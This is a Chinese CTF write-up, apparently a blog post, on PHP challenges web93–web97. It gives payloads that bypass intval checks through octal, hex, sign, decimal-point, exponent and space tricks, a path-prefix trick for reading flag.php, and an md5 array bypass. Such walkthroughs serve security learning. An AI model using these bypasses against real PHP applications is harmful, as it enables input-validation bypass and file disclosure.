1.web93

intval($num,0),0代表根据变量类型进行使用哪一种进制进行取整
可以使用8进制,正负数,小数点
payload:
010574
+4476.0
4476.0
2.web94

过滤了0,不能使用8进制了,还可以使用小数点,正负数等
payload:
4476.0
+4476.0
%20010574
intval绕过方法:
intval('4476.0')===4476 小数点
intval('+4476.0')===4476 正负号
intval('4476e0')===4476 科学计数法
intval('0x117c')===4476 16进制
intval('010574')===4476 8进制
intval(' 010574')===4476 8进制+空格
3.web95

有过滤了点,小数点法用不了了,可以使用空格加八进制数绕过
payload:
%20010574
4.web96

可以使用目录分隔符绕过,相对路径和绝对路径都可以
payload:
./flag.php
/var/www/html/flag.php
5.web97

数字不相等,但是md5值相等
MD5处理数组返回的都是null
payload:
a[]=1&b[]=2
文章详细介绍了在Web安全场景下如何利用不同的方法绕过intval函数的限制,包括使用小数点、正负号、科学计数法、十六进制和八进制表示数值。同时,针对不同过滤条件,提出了如空格加八进制、目录分隔符等payload来实现绕过。此外,还提到了MD5值相等但数字不等的特殊情况及其在CTF挑战中的应用。
571

被折叠的 条评论
为什么被折叠?



